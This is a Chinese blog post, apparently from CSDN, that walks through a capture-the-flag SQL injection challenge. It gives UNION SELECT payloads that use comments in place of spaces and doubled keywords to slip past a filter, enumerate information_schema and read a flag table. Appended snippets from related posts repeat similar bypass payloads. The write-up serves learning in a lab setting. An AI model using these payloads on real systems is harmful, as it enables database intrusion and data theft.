ctf /**/与双写 绕过sql过滤

最新推荐文章于 2023-09-05 15:09:44 发布
最新推荐文章于 2023-09-05 15:09:44 发布
阅读量3.6k 收藏 12
点赞数 4
文章标签: ctf sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43943098/article/details/95465034
版权

注意:
本博客可能转载了多处文章内容,所有转载内容均会标明出处,谢谢!!

1.在文章开始之前的话

本人也这是刚刚接触数据库这一块不过一周的时间,在此之前都是普通的码奴,所以对sql的命令或者语句有着错误的理解,请各位dalao海涵并在评论里指出。

2.浅谈我对sql和sql注入的理解

所谓sql,其原名是结构话查询语句,对于这个结构化我首先想到的是Linux里大部分的命令都带有的 -型的参数,再则就是对数据库进行访问的各种命令。而sql注入便是本来是获取从用户哪里输入的字符或者字符串,有意无意的形成了sql语句从而获取了来自数据库的不向大众公布的信息。

3.具体的解题过程

题目来源:http://www.shiyanbar.com/ctf/1875
标题界面
看到如此简洁的界面和输入框我自然是忍不住直接输入了 '1 or 1=1# 毕竟是sql注入里比较常见的语句了
????
嗯?直接出错还行,那换一个格式试试 '1 or ‘1’=‘1
emmmm
这会有输出了,并且出现了所有的内容。看来or并没有过滤,那来试试输入 1’ and ‘1’=‘1
在这里插入图片描述
啊?什么都没有,什么情况,难道是是把and给过滤了?有点东西。那把and双写试试。
在这里插入图片描述
有了!而且少了and和后面的空格看来,这个过滤是可以被绕过的过滤类型。
没事,这里想到用//绕过过滤,用union
(这里的//是css里的注释,类似于c语言里的/*,python里的#)
1’//union//select//schema_name//from//information_schema.schemata//where//‘1’=‘1
在这里插入图片描述
接下来,获取其表名(table_name)
1’//union//select//table_name//from//information_schema.tables//where//‘1’=‘1
在这里插入图片描述
这里会获得一大堆表明,但是最让人关注的table_name : flag ,人活着就算为了ctf的flag!!
那么接下来只需要获取flag的字段名就
1’//union//select//column_name//from//information_schema.columns//where//table_name=‘flag
在这里插入图片描述
欸!!,怎么报错了啊,明明flag就在眼前了。
仔细看看报错信息,它把information_schema.columns和columu_name给我过滤掉了。那直接把它们都双写了(注意:这里的双写应该把其放在其内部位置 列如:abcd->abcabcdd)
1’//union//select//column_nacolumn_nameme//from//information_schema.coluinformation_schema.columnsmns//where//table_name=‘flag
在这里插入图片描述
获得了字段名了,再使用如下命令获取flag的值,希望不要再来什么过滤啊啊啊啊。
1’//union//select//flag//from//flag//where/**/‘1’='1
在这里插入图片描述
有了!!
解题结束

猫耳灵喵
关注
  • 4
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
一天一道CTF 第13天(双写绕过SQL注入 dirsearch)
scrawman的博客
03-22 529
今天做两道因为明天有个大工程 [极客大挑战 2019]Upload 背景选的不错 就是简单的一句话木马然后抓包改后缀名再webshell连接,做过太多遍了这里就不做了,直接下一道 [极客大挑战 2019]BabySQL 尝试admin' or '1'='1和password'发现password里的or被删掉了,这里应该是用最简单粗暴的删除字符串来过滤。多试几次就会发现还过滤了union和select,这种过滤双写绕过即可,payload基本都和上次一样。 http://74522396-5ad3-4
buuctf(babysql)(双写绕过)
qq_75005708的博客
04-10 211
这道题最明显的是双写绕过,然后我们需要去拼接双写语句达到绕过的目的,双写的方式也不一定是固定的,这道题在我们尝试的时候也会发现其实它也过滤好几个单词,有时候我们需要部分双写,也不需要整个单词双写,因为它不是整个单词都过滤。如果我们在尝试这条语句的时候,发现报错,可能是环境的问题,我们用括号把information到tables括起来就不用空格了,一般情况下是不会有问题。然后我们就发现登陆成功,应该是or被过滤了,我们要双写绕过它,我们接着查看它的列数。我们发现2和3在页面显示,接着查看它的数据库。
oracle 双写转义字符, 字符过滤下的攻击:双写绕过
weixin_39757040的博客
04-03 196
1、软件系统常用的安全防御措施包括:字符过滤技术等。将可能带来安全隐患的,带有特定含义的字符串在接收客户端输入后立即清洗过滤,避免攻击脚本在服务器或者反射回客户端执行;2、以下为实际场景实验,打开靶机页面:3、我们看一下过滤代码:$name = str_replace( '', '', $_GET[ 'name' ] ),被拦截过滤掉;4、在What's your name? 输入框内输入:'>a...
CTF学习笔记11:iwebsec-SQL注入漏洞-09-双写关键字绕过
lvx++的博客
01-23 864
一、解题过程 感觉题目越来越简单,只需绕过select关键字过滤即可 ?id=-1 union selselectect 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users
sql注入
qq_44040833的博客
02-03 3123
SQL注入 sql注入就是web应用程序对用户入的数据合法性没有进行判断,前端传输参数由攻击者构造的sql语句被带入到了数据库,依靠构造sql语句可以进行查询,删除等操作,如果数据库权限很高,还可以对操作系统进行操作。 SQL注入的各种方式 注入点分类 数字注入 字符注入 搜索注入 传参方式分类 get post cookie http头部 返回信息类型分类 布尔盲注 ...
bugku学习之39.多次(检查过滤双写绕过过滤以及报错注入)
s11show_163的博客
03-04 701
考察: 过滤的判断length 异或符号的使用:id=1’ ^ (length(‘order’)!=0)%23 双写绕过关键词过滤:id=1’ oorrder by 3%23、 id=0’ uunionnion sselectelect 1,database()%23 无法双写绕过时的盲注报错注入:http://123.206.87.240:9004/Once_More.php?id=1' an...
CTF知识总结,写的不错
10-29
- **正则表达式绕过**:在WAF或过滤机制中,理解正则表达式的局限性可以帮助构建绕过规则的输入。 2. **PHP安全** - **`preg`函数的Bypass**:某些情况下,可以通过精心构造正则表达式来规避过滤。 - **`...
SQL注入绕过的技巧总结
12-14
这篇文章是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入绕过技巧,这篇文章随着自己的见识和能力不断的提升,所总结的方法也会变多。  一、引号绕过  会使用到引号的地方是在于后的whe
第十二节 XSS 过滤绕过-01
09-15
XSS 过滤绕过技术详解 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的 Web 应用程序安全漏洞,攻击者可以通过插入恶意脚本来盗取用户信息、破坏网站操作等。为防止 XSS 攻击,开发者通常会使用 XSS 过滤...
CTFSQL注入常见题型整理.pdf
最新发布
02-11
- **绕过过滤** 假设系统对单引号进行了过滤,那么可以使用双引号来构造SQL语句,如: ```sql id=" OR 1=1 --" ``` 这种方式同样能够绕过验证。 - **利用SQL特性** 在某些情况下,即使部分特殊字符被...
SQLi-CTF-master.zip
04-09
- **ASCII与十六进制转换**:在某些情况下,需要转换字符编码以绕过过滤。 4. **解题技巧**: - **理解题意**:分析题目给出的信息,确定可能的注入点。 - **信息收集**:利用注入获取数据库名、表名、列名等...
sql注入绕过技巧
m_ing
10-21 1912
前言 今天斗胆来整理一下sql注入的各种绕过姿势,以后方便查阅。SQL注入绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。 1.括号绕过空格 如果空格被过滤,括号没有被过滤,可以用括号绕过。 在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。 例如: select(user())from dual where
BUUCTF-sql双写绕过
m0_64180167的博客
04-06 621
打开环境 查看什么类型输入字符型我们开始尝试万能密码发现返回的东西和我们输入不一样 or没了过滤了or这个是关键 我们使用双写绕过得到了账号密码我们开始sql注入发现or 过滤了 我们看看还是报错 我们接着看看是不是过滤了 by 因为如果过滤了der 他会返回or成功了 三个字段我们开始爆破数据库得到数据库名 geek开始爆表开始爆数据都是返回这些名得到flag。
information_schema过滤与无列名注入
snowlyzz的博客
09-06 1285
information_schema过滤与无列名注入
网络安全——绕过
W981113的博客
01-01 4047
1.编码的问题 http在传输特殊字符时需要在浏览器中编码,常见的比如空格、回车符等 编码是有规定的,但是具体如何编码没有规定,不同浏览器编码方案不一致,不同字段编码方案也不一样 结论:所有浏览器都有编码的习惯,那么后台接收数据时。首先需要处理编码就是解码,解码是把已编码的字符还原,其余未编码的不动。 2.实际测试 当对浏览器的输入区域进行输入字符时会出现两种情况: 1.输入的字段被浏览器自动编码,例如输入空格,浏览器自动编码为%20,传输时http中也是%20形式传输的 2.输入的字段是编码形式,浏览器自
sql注入常见绕过方法
ljlrookiebird的博客
09-05 4218
sql注入是web安全的常见漏洞,这里总结下常见的绕过姿势,还有其他没总结到了,小伙伴可以留言补充
ctfshow命令执行(web29-web56)第一部分
qq_63928796的博客
10-05 1698
过滤了flag可以用*或者?绕过
每天一道ctf
whisper921的博客
10-28 942
有这样一行代码
CTFHub之RCE
遇事不决冲冲冲
04-17 1501
应用有时需要调用一些执行系统命令的函数,当服务器没有经过严格过滤用户的参数,这时候就可能导致命令执行,从而导致命令执行漏洞 常用命令执行函数 system():  该函数会把执行结果输出。 passthru():  该函数只调用命令,并把运行结果原样地直接输出没有返回值 exec():  不输出结果,返回执行结果地最后一行 shell_exec():  不输出结果,返回执行结果 eval执行 源代码就在脸上 <?php if (isset($_REQUEST['cmd'])) { eva
SQL注入技巧:绕过逗号过滤方法总结
"这篇文档主要介绍了SQL注入中的过滤逗号注入问题及其解决方案,通过各种方法绕过逗号的过滤限制,包括使用fromto、join、like以及limit的offset技巧。同时,文中还提到了一些CTF比赛中的实际题目作为示例,帮助理解...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值